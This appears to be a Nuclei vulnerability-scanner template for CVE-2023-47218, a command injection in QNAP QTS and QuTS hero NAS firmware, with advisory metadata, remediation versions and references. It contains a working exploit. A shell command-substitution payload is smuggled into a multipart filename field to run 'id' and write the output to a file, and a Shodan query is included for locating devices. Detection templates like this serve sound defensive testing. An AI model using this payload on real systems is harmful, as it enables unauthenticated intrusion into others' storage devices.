id: CVE-2023-47218

info:
  name: QNAP QTS and QuTS Hero - OS Command Injection
  author: ritikchaddha
  severity: medium
  description: |
    An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.
  impact: |
    Unauthenticated attackers on the local network can execute arbitrary commands remotely, potentially compromising NAS devices and stored data.
  remediation: |
    Update to QTS 5.1.5.2645 build 20240116 or later, QuTS hero h5.1.5.2647 build 20240118 or later, or QuTScloud c5.1.5.2651 or later.
  reference:
    - https://github.com/passwa11/CVE-2023-47218
    - https://twitter.com/win3zz/status/1760224052289888668/photo/3
    - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47218
    - https://www.qnap.com/en/security-advisory/qsa-23-57
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 5.8
    cve-id: CVE-2023-47218
    cwe-id: CWE-77
    epss-score: 0.93153
    epss-percentile: 0.99802
    cpe: cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"
    product: qts
    vendor: qnap
  tags: cve,cve2023,qnap,qts,quts,rce,intrusive,vkev,vuln
variables:
  file: '{{rand_base(6)}}'
  cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22'

http:
  - raw:
      - |
        POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary="avssqwfz"

        --avssqwfz
        Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}"
        Content-Type: text/plain

        skfqduny
        --avssqwfz–

      - |
        POST /cgi-bin/quick/{{file}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_1, "code\": 200", "full_path_filename success")'
          - 'contains_all(body_2, "uid=", "gid=")'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022079863ca40824c357ff4d3ed27fdde2cf252ad470e8fb2247bf2b2a32ff51ef1f022026d2b93032474263a512c1513745e0b8f7e55eb3ca472aac49c586c95b6ed8e8:922c64590222798bb761d5b6d8e72950